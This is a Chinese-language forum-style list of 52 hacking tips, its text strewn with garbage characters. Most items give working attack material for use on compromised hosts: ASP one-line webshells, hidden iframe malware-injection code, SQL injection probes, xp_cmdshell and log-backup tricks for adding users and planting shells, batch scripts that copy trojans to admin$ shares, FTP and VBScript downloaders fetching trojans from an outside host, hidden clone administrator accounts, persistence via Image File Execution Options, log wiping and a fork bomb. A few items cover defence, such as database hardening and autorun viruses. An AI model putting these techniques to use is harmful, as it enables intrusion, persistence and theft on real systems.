Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
% { l4 v% w0 [ o* h- `cacls C:\windows\system32 /G hqw20:R
' `6 X- o0 b% a% a" \4 t思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入 H+ c1 Y* g' Y( l& \& u, o8 v
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F+ g! m0 ]9 e, k; X, j q
) S9 C0 K8 ]% ]1 `2 ]; @2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
* ?& |) X2 e+ o- i+ @+ N+ m$ L: X/ p
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。( H l4 |0 d( |
2 r9 `, W# r% M9 _; R
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
1 `& c W1 a( t: V. c
! A( Y; c, g! M5、利用INF文件来修改注册表
' {/ j# J5 E8 \[Version]
; A( u/ A1 ~' Y6 iSignature="$CHICAGO$"! C2 }, j& e0 R; S, x2 l3 l
[Defaultinstall]
) |! ]7 P! |3 r, S6 ~addREG=Ating
7 u' r) x6 D# q8 f# @' `[Ating]
$ ~8 V7 H/ L2 v7 U# A3 Z$ ZHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"' `( C( f- N: l8 l6 F
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
. D7 I3 _& j0 D3 e C- J P% _& t% N5 _rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径% A9 k4 R/ w, ]) k: b3 y) m6 m- C
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU% e3 l% I, V" R
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU# F( t: P+ h) N
HKEY_CURRENT_CONFIG 简写为 HKCC" Z7 G* p4 n) D1 f6 m
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
# t. i; K* m) U% C" C% T* L"1"这里代表是写入或删除注册表键值中的具体数据6 o) H9 K7 a' Y) S
9 I+ v$ @2 \% E6 y6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
! k* s; I9 c I2 i& D" g多了一步就是在防火墙里添加个端口,然后导出其键值- u* B1 `, B* ?" n
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]0 {2 |- V5 i5 Y2 U& g* f R6 S
9 m# u+ O' a+ [: w `4 J4 s x
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
, [9 j$ V! d1 E在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。) E9 y% ]. t& C5 T7 _4 w$ H
# W* C! J0 T1 c9 H; q
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。3 ]% [) p/ r! Y: S/ |
: u D7 Q. a& Z/ l. A- C8 }
9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,! N$ x' I/ J) ~: E7 `- z8 ]4 t
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
/ J2 a& X: g5 w9 d0 q
4 j( M) ^3 Z7 D10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
; [$ @# ^! l, B/ V& R+ n; @# P v! N* O5 c+ Z( g# r
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 Q" [3 k* q+ e0 ^; g3 p+ ?" D用法:xsniff –pass –hide –log pass.txt' B1 \5 a9 v5 G9 u: @# S
# U" n l1 h" e' D% z \) X
12、google搜索的艺术) B: i$ f7 v2 p0 U( U* L7 e
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”4 _1 u+ `0 Q0 i Y
或“字符串的语法错误”可以找到很多sql注入漏洞。 @! i0 B/ @+ v1 y1 `' `
8 W6 j t- C+ |) x) N" A* ^& {9 M; D( c
13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
* {3 o4 N# z0 d4 z. E8 H2 R
5 V4 i: Y, ~0 P; Y" J2 ]* [9 S14、cmd中输入 nc –vv –l –p 19871 H2 j5 |- W1 g4 l' j, f3 }
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃( }# O7 M1 w& G# {
' {" V0 p& N7 I; g( u3 e15、制作T++木马,先写个ating.hta文件,内容为$ T( Y% c/ N9 e! H& z! h: L9 o; N
<script language="VBScript">
# k! _( w1 G) V6 w: T2 _set wshshell=createobject ("wscript.shell" )7 Z0 f% X$ S1 Q, Z3 n
a=wshshell.run("你马的名称",1)
8 ~& N6 u; t) d; s2 wwindow.close
0 M. \, P- }! b</script>3 _( ?, V P- c) K0 x- Q
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。# a- }- L. ~1 }3 w+ V4 a0 _) M
( i! f6 s$ t6 }
16、搜索栏里输入
" T8 K9 y! n1 c# c" @1 W" V# N关键字%'and 1=1 and '%'='5 ~8 o8 k4 [7 c2 k% G
关键字%'and 1=2 and '%'='# v& y8 V% X! M' ^4 Q8 t
比较不同处 可以作为注入的特征字符
0 E p9 S ]) W3 I. s
( O3 s7 s! h; _/ O9 ?2 V17、挂马代码<html>
; J9 ? C5 F/ C. z G& }* D<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>
9 H" @, [5 u s+ K</html>7 K( ?0 P8 S4 ~* z9 \& e- f- h
( B& J9 o% v( X6 `" ?: U9 H: N18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
; J2 T5 E3 _% [3 v& Jnet localgroup administrators还是可以看出Guest是管理员来。( \2 `7 A8 r" B
5 O0 t7 `: l7 _2 @' c) _19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等6 I- Y# B/ x' |. Z# `
用法: 安装: instsrv.exe 服务名称 路径
+ G$ o; ^( [3 b' e8 B& W% m卸载: instsrv.exe 服务名称 REMOVE
; E" Z, A7 f4 U& R0 j1 d- F/ o, b; v# X
8 w6 M$ {% Y! f% g( ]" _
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉- ]" _+ f. b1 Q! p" o4 K+ s
不能注入时要第一时间想到%5c暴库。
. T" j4 c! c; {! f6 ^. m9 c% g' x
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
. Q% G2 Q ]! M
: Y4 x& G. B" b% @1 a3 O23、缺少xp_cmdshell时 x; f; ?2 n- z A9 j( }; y
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'8 f: n& c1 h" h: G; \
假如恢复不成功,可以尝试直接加用户(针对开3389的)
, w4 d7 ~: b5 @) _1 b) ndeclare @o int
0 c# @- U8 ?: S, l' E; x% Eexec sp_oacreate 'wscript.shell',@o out0 n0 E$ c3 _( f0 b
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
8 V2 H7 ~6 e4 o7 L
% N; G0 G' ^3 E F4 I4 J& w24.批量种植木马.bat% l0 X* w9 T. x5 F3 r
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
. A4 d" `% ]4 R% P' t4 j, S* tfor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间0 d' z7 N+ S5 ^; r ?
扫描地址.txt里每个主机名一行 用\\开头& K& u0 c5 k: q. I
: p0 w2 _+ {1 \; h
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
% v( ], G: l5 R( J" {# E/ x/ J# f9 l h; J i3 c4 P
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
) a$ x5 N8 T6 a8 b, [, ]6 ]将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.9 L7 [' N8 R& \6 Z, d0 ~* L1 G
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马; q r# o/ h0 }6 d" @% _8 k+ ]
9 B; P3 [2 k- y2 p1 r
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
" C# L' b4 X5 |2 o0 y+ _" A然后用#clear logg和#clear line vty *删除日志8 n/ ]3 j. q; O0 h; b$ E3 E
0 l6 b% h6 n @; }0 p$ Z3 J1 T5 Z7 M28、电脑坏了省去重新安装系统的方法3 _* o4 X& s- W: u
纯dos下执行,
5 }+ ~9 H9 n+ X' R- n# lxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
6 A4 ]$ q1 T2 [0 q' [/ \/ ~; P2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config' K7 B! M1 K- h) C
" w' o( `4 X% E$ y! _8 c, K0 B- i+ y
29、解决TCP/IP筛选 在注册表里有三处,分别是:- P$ M) }8 p. J6 b9 s8 j2 r7 j( X
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip3 j/ N- k% b% X
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip+ w% a. k6 v1 f8 C
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
2 C/ ]( U. R( @( S3 f8 r分别用! K4 m K2 D4 _ J
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip' N: H7 T+ |! v6 M# d& e
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
) F- ^( O) S6 J/ Q5 P. Yregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
5 ~6 n/ z, u. |) S# D9 G命令来导出注册表项4 X+ K7 {) B- ~& T" y) T9 W
然后把三个文件里的EnableSecurityFilters"=dword:00000001,6 K, R+ v! E6 p/ I5 L4 R
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用+ W* j4 }1 U* }: K7 @! z
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。) U$ T. e( K/ w4 \/ l
; K( ^7 S: E- a3 P" z9 N7 W* \+ @, ^30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
% w- v6 \8 f" t' [- D+ \: t. uSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
3 Q4 t9 ]- t) i9 y7 }4 _/ S9 D$ N M" p/ L; |2 W3 a6 G1 c
31、全手工打造开3389工具! z& G& y+ q0 X! P, m
打开记事本,编辑内容如下:
& Q& B6 t; i6 @" l2 B; o( g; Necho [Components] > c:\sql* b2 `, G" ]0 g& X: C% s
echo TSEnable = on >> c:\sql8 I8 f5 Q7 e# n) m5 e. b
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
6 A6 ~! ~! G- T/ L+ p+ I4 K: u4 {, R9 {编辑好后存为BAT文件,上传至肉鸡,执行+ p @5 ]7 \; W7 X q
- e: Q( z" b9 ~8 g2 n1 ]
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马% {) ^$ V( I. z" }6 ~: J
: g5 U$ d" _7 w9 L/ @: L
33、让服务器重启
( s' P I. {) D( r/ `写个bat死循环:; F/ V) X- g3 ^% M4 Z n' i# E
@echo off- g& _% ]9 J% K- P
:loop1
- J# S, ^) p1 u6 m2 fcls
! l& @! A: p& T" f/ y, sstart cmd.exe
) o( u5 j8 ~; b% ^goto loop1
0 `* n5 o2 ~5 g' Q4 O* E4 _6 ^9 L+ z保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启- {6 d$ d2 y+ Y' N, w C4 A* Z
. l2 \' w" f( A4 o4 _' l$ Z
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
4 M' E% W, H& [0 r" ^@echo off
7 ^0 p5 c$ d4 Y+ C# Q Kdate /t >c:/3389.txt0 i2 S) J1 T n1 v. h0 j0 j9 P- I
time /t >>c:/3389.txt! @, L J' c( ?- J
attrib +s +h c:/3389.bat! }0 ^' a$ p1 g( z, M$ v3 U# V
attrib +s +h c:/3389.txt
1 K$ \; V+ L! l3 n# Jnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt( D: k- m$ s8 k; s. V
并保存为3389.bat
3 ]: R- j( f& n打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号1 `. P6 M4 B) I4 y
* @* K3 X, N, O: ~35、有时候提不了权限的话,试试这个命令,在命令行里输入:
* f# R4 R0 ~* ?9 m! Wstart http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
% A2 [5 y3 I% O% E6 S1 b输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
" F/ F2 ?- P$ m6 z- ?& K+ N! z# Z, h" g i
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
* t1 ~$ Z! j, Fecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
" Q; W' d1 A7 y0 Techo 你的FTP账号 >>c:\1.bat //输入账号" p" |8 [# N- J* [+ V; ?& Y
echo 你的FTP密码 >>c:\1.bat //输入密码
4 V. h* g* k. X8 secho bin >>c:\1.bat //登入
) h- O' d! f' S- B9 Xecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么; q0 `& ?1 Y! v
echo bye >>c:\1.bat //退出$ g6 O# M% X- A/ {9 c
然后执行ftp -s:c:\1.bat即可
9 B9 M" X, Z6 f Y
, z5 w+ T' m$ M2 q$ Q6 d* H37、修改注册表开3389两法
$ P4 C2 D- H' v4 j(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表- X3 h8 E( V6 f, h1 j- _; O1 b: j# d1 U
echo Windows Registry Editor Version 5.00 >>3389.reg* `( F- z# @4 E6 |
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
* R, _* G9 [( F# Vecho "Enabled"="0" >>3389.reg2 S8 S S2 }0 b9 L9 t. V, y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
: l2 S) d) v( L, t" c6 P+ ^NT\CurrentVersion\Winlogon] >>3389.reg
: s4 R( O* Y7 V1 ?$ [# decho "ShutdownWithoutLogon"="0" >>3389.reg
) i5 x# b8 D- B! ~echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]+ ]3 N1 A) K& |/ o8 E
>>3389.reg
# @3 y7 x! `' K# {( I6 V3 decho "EnableAdminTSRemote"=dword:00000001 >>3389.reg' R1 R, v% }0 e# @5 N
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]0 h' Y5 k" d3 H4 P
>>3389.reg1 ^! A$ \7 ~% n) V
echo "TSEnabled"=dword:00000001 >>3389.reg4 J# U1 ~* C# `6 \ h: i" P& O$ @; ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg' G8 y" Y" D/ ~! G9 A1 y6 H' `
echo "Start"=dword:00000002 >>3389.reg
; r% d6 ~3 i0 W* x, Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
8 u0 b6 l2 {& Y2 L. z>>3389.reg
! \% p3 Y4 M; ^0 U3 ]9 necho "Start"=dword:00000002 >>3389.reg
- X( N. }4 ~* x9 ]( ~ d+ ^echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
2 d) t$ R9 C/ Hecho "Hotkey"="1" >>3389.reg$ o6 ?- Z. o$ f0 [9 q" r
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ ^1 N% J4 [' v2 I' X0 b
Server\Wds\rdpwd\Tds\tcp] >>3389.reg6 ?" s+ {4 o( v8 q1 p3 S1 E
echo "PortNumber"=dword:00000D3D >>3389.reg
, ?* m% s% U& q! v* W: decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal' D5 ^+ d0 n1 Z7 J0 r# ?
Server\WinStations\RDP-Tcp] >>3389.reg: c* Q# H+ A* V6 r% b8 U% N
echo "PortNumber"=dword:00000D3D >>3389.reg& b5 N& T$ F+ J5 q6 T' P
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。9 n4 F* G& Y6 y! S( K
(如果要改变终端端口只须把上面的两个D3D都改一下就可以了), u2 \# [7 w+ ?+ t) U5 ]" p+ [! P
因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效8 |+ C( M0 {! S# ]* j
(2)winxp和win2003终端开启
p( _0 a: T5 C) `用以下ECHO代码写一个REG文件:
# @+ f8 N( U F6 ^echo Windows Registry Editor Version 5.00>>3389.reg
9 N& A! ~% m( Z) }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal! t" H- ] a' \
Server]>>3389.reg
8 p: }+ f) Y, d. H, P) m. Oecho "fDenyTSConnections"=dword:00000000>>3389.reg: t# |2 _( E$ O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
( ^. s& V: E5 cServer\Wds\rdpwd\Tds\tcp]>>3389.reg
( D+ Q" _9 j6 {2 M7 ?1 {: d! f8 jecho "PortNumber"=dword:00000d3d>>3389.reg
& @7 |3 j- L5 Q h4 H7 o1 }9 E, Recho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
$ P9 l( w, I! ?0 dServer\WinStations\RDP-Tcp]>>3389.reg; W5 R1 P, g& x
echo "PortNumber"=dword:00000d3d>>3389.reg
" h P: Q* N7 S) L' V* T然后regedit /s 3389.reg del 3389.reg: ~4 g2 s) `, l- d
XP下不论开终端还是改终端端口都不需重启
# P0 U0 h1 a5 T5 D# M; ^9 R0 @0 k9 z d. ^6 h8 M9 G9 N! a( m
38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃
( ]5 O5 g) `3 d4 }, J用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'- D9 {' J4 \5 H7 m, l# c
( R. k' ^ X0 R( [39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!% J& y) t0 W! e. g6 ]+ l
(1)数据库文件名应复杂并要有特殊字符4 E# ]/ z( k4 _# N/ f
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
: M* t3 C; r( U4 B7 z+ J8 q将conn.asp文档中的! p2 k/ ~; y( p- y4 [8 G. J/ |. z
DBPath = Server.MapPath("数据库.mdb")
5 }+ c3 [+ k4 z2 S( i. e& Rconn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
1 @0 {% w D3 c
! u# H+ V6 V: e* j) E修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
0 V. E& y& ?5 ^8 V9 A5 i* ?# n( m, e(3)不放在WEB目录里
0 [, `8 L! P7 ?9 ]& h- |( L+ n/ T: e# B0 R; A& }3 f. D9 I# i/ i$ Q
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
% m2 i; M0 E' J$ k; @8 j6 J1 Z可以写两个bat文件% O6 I: \( W5 p3 ~) e- u0 R: Y
@echo off
; l" C. ~, c4 b@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe }5 q9 u7 E5 U9 W9 F0 T
@del c:\winnt\system32\query.exe( k: u V, j3 f1 U6 ?
@del %SYSTEMROOT%\system32\dllcache\query.exe* T+ x) F3 T) Z6 E S8 U) R
@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的8 \% i s9 m3 s, t" S( g
6 ^ A9 _+ v) q5 w@echo off4 y% K4 m& Y( ^* ]% k, a; D
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe. S9 ]4 G. n" n7 |% {
@del c:\winnt\system32\tsadmin.exe) {$ \7 L( s. W% I
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
9 Z0 n5 v. Q# v3 [+ n# M! I. V6 l* `2 ^
41、映射对方盘符- j/ h3 {" A# h$ h/ d, ` y
telnet到他的机器上,' T E2 _3 R% d# R$ y( C$ W
net share 查看有没有默认共享 如果没有,那么就接着运行( W, N! R% w7 f$ p# s" u
net share c$=c:# q0 _$ o. z% x# R* G9 D2 D% I
net share现在有c$
4 I! P% p$ [0 U3 x9 ]0 S" u在自己的机器上运行4 C0 v( v8 v$ {2 c: ^
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
; ?7 ]8 E# ~8 v; }& T, b, U% W; w k6 A2 {
42、一些很有用的老知识' A: y# o K$ U* m' z A" ]1 h
type c:\boot.ini ( 查看系统版本 )" T9 L9 ^9 v) T' u
net start (查看已经启动的服务)
5 i. O6 F3 y7 @- S& _) lquery user ( 查看当前终端连接 )( C/ Y) T' P2 K" [- o3 C- I
net user ( 查看当前用户 )
j" ?# k8 J0 ]: E2 ^* Vnet user 用户 密码/add ( 建立账号 )
" F P$ M [# g3 a7 Unet localgroup administrators 用户 /add (提升某用户为管理员)
$ n- b2 m' R6 g& ^% S& \2 o tipconfig -all ( 查看IP什么的 )
9 M) q( Z. k& m; _3 y; D5 bnetstat -an ( 查看当前网络状态 )
+ c% x" D+ ]) M! w- |findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)
+ o% `; k; ?+ N# ?' H+ k: c克隆时Administrator对应1F4' L# ]" K7 H0 e6 i9 _+ {2 `0 ^/ u
guest对应1F5; |! z) O5 }8 _" _" J* E- A
tsinternetuser对应3E8# c3 Q) F5 ?6 F' v. ]# `
* F$ [. x' ?! M& n43、如果对方没开3389,但是装了Remote Administrator Service3 N _! v: Z. V- G; p
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
+ u. n; M8 i* a% c- `! o+ H解释:用serv-u漏洞导入自己配制好的radmin的注册表信息% a3 H# S5 t+ k4 d4 Q: Q
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
) @# h/ X8 l: F. v. d3 j6 M
$ `/ o, Q2 _1 R3 E+ _ H44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定); h, @7 o5 O1 E4 ~* h0 V
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)4 w1 S, o, R5 F! |3 h
! h- } E+ Z: P7 D7 k; }45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入): Q: n0 z6 t( v/ D
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
/ [9 q3 v/ o' t% a5 _^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =7 p! l7 T7 f* X" T d, f- ^
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =3 l% `' A: `( m% e
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
0 ^5 I: ^- G$ G6 n- i2 G(这是完整的一句话,其中没有换行符)
; s$ C- K" N+ p' {然后下载:5 g* @5 u/ I T+ A1 Y1 L; j
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
( B" H2 z% a. o Q S4 G1 g" I* S( s- g' t& w3 t7 D
46、一句话木马成功依赖于两个条件:
% G+ w$ f# U" o3 v* z/ k+ v8 l! [, \1、服务端没有禁止adodb.Stream或FSO组件1 y% P: o& i5 O3 _" b
2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。 z$ E0 j* l, W) ?
. t3 W" q& S% M9 y- i* b* L7 G- n47、利用DB_OWNER权限进行手工备份一句话木马的代码:( e. P8 f/ F( v1 X9 @; b
;alter database utsz set RECOVERY FULL--( \' d; D8 ~# B/ d* E
;create table cmd (a image)--
/ N3 B7 k) V$ B;backup log utsz to disk = 'D:\cmd' with init--5 E+ K# y+ N; u0 L5 y" s/ F
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--3 Y \* C' k) ]7 k
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--7 [. z! |7 N$ ~
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。$ F H) p& {. W$ o v0 \
% ?* I: h- O: r: h4 I
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:: G6 P: t7 E3 l3 h' B5 v
' V: D. F8 b% U# Y* S
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options7 ?2 f% {* ?- n
所有会话用 'all'。
' m p, k6 J5 O-s sessionid 列出会话的信息。$ k: h$ ]+ o; f
-k sessionid 终止会话。
5 H. e! i) [* Z% e-m sessionid 发送消息到会话。9 S& V0 ~$ {( M5 g( M* s: M
) G! h0 }7 @. }config 配置 telnet 服务器参数。
7 n2 G+ g# E( z- ^, V4 e/ W9 w0 C. d4 T4 ^$ E$ U9 B
common_options 为:2 T9 e" X$ U1 T/ j3 l* f
-u user 指定要使用其凭据的用户, ]" F- i$ e( O
-p password 用户密码
: s* ?$ v5 e2 {+ p3 S. S. z5 A6 [2 W5 a& `
$ z1 d9 z0 H; e: A" [config_options 为:
: m8 e1 g, C1 i k* G) q2 @dom = domain 设定用户的默认域
% b3 G# z! q9 ~9 K, W1 tctrlakeymap = yes|no 设定 ALT 键的映射( H/ ^% o8 o) J+ D- M+ w% \* Y, }
timeout = hh:mm:ss 设定空闲会话超时值
; R M3 [! x# o( b; Q# mtimeoutactive = yes|no 启用空闲会话。
/ p6 h p- l( |4 H/ ?maxfail = attempts 设定断开前失败的登录企图数。6 s0 h! n/ R# _% b) V5 o* z
maxconn = connections 设定最大连接数。
/ B8 V; x& [9 Gport = number 设定 telnet 端口。6 W Y5 p- {$ z- k+ V4 ]$ |7 b
sec = [+/-]NTLM [+/-]passwd% z( ~' M4 l8 Z s; @7 a; ]7 R: V
设定身份验证机构1 Q4 O8 y5 B+ M$ H5 n. z
fname = file 指定审计文件名。
; [/ ~8 q ]: afsize = size 指定审计文件的最大尺寸(MB)。! K4 R1 w) X1 B7 E
mode = console|stream 指定操作模式。) N, i; F9 ?, c. W9 ?. P- h
auditlocation = eventlog|file|both2 W9 X f; L- n
指定记录地点
: s, ^( \7 X" Oaudit = [+/-]user [+/-]fail [+/-]admin$ K( f; [! E2 Q9 ~: z* n
4 l+ {% L0 ?- w/ I! j4 K9 v
49、例如:在IE上访问:, }+ E9 p! j! Y5 C6 z5 G) t
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
5 L* S' ]2 }! d! m8 U8 | C8 Whack.txt里面的代码是:
+ E1 h# H/ c; A! F: p<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
: H8 w8 W- M y( n0 r- `把这个hack.txt发到你空间就可以了!
' e8 v3 J% }6 X; H这个可以利用来做网马哦!
" S; E) V4 {1 T i3 C
1 T& z# \" _5 V) |/ {. B! \50、autorun的病毒可以通过手动限制!: f0 P9 e4 n' ^' h
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
2 V7 D/ w3 x; l# p2 c6 J2,打开盘符用右键打开!切忌双击盘符~
. O1 x3 Q0 w+ j4 b5 e3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
/ u1 n# p/ z' N9 r0 y+ [0 c: h- G* c0 Z2 ^+ c4 l$ j
51、log备份时的一句话木马:, U5 _$ ]$ Z! X$ M$ f1 R( \
a).<%%25Execute(request("go"))%%25>7 j: _8 g8 g! g! G+ X
b).<%Execute(request("go"))%>
$ Q6 T. `+ a: P7 v& j" Qc).%><%execute request("go")%><%
" z( N s' {4 ^0 ?d).<script language=VBScript runat=server>execute request("sb")</Script>
( _) \9 |6 h7 { m. le).<%25Execute(request("l"))%25># a: ~. I" m# o, A* S* c3 O: p
f).<%if request("cmd")<>"" then execute request("pass")%>
7 B0 G/ T4 A' W( E* O, c2 K! V
& L- h% T/ g. s2 p. {) w3 Y52、at "12:17" /interactive cmd
* }) l0 p/ G/ y; F执行后可以用AT命令查看新加的任务
